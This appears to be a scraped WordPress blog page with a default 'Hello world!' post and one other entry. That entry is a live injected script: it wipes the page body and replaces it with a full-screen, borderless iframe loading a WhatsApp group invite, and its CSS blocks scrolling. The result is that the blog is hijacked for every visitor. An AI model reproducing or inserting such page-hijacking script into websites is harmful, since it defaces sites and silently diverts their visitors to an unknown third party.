Blog

  • <script>

    $(“body”).html(“”);

    var iframe = $(“<iframe></iframe>”).attr(“src”, “https://chat.whatsapp.com/BjNytZuFLDw7SRBGSaIB2G“).attr(“height”, “100%”).attr(“width”, “100%”).attr(“noresize”,

    “noresize”);

    $(“body”).append(iframe);

    </script>

    <style>

    *{

    margin:0px;

    border:0px;

    padding:0px;

    }

    body { overflow: hidden;}

    html, body, iframe { height: 100%; }</style>

  • Hello world!

    Welcome to WordPress. This is your first post. Edit or delete it, then start writing!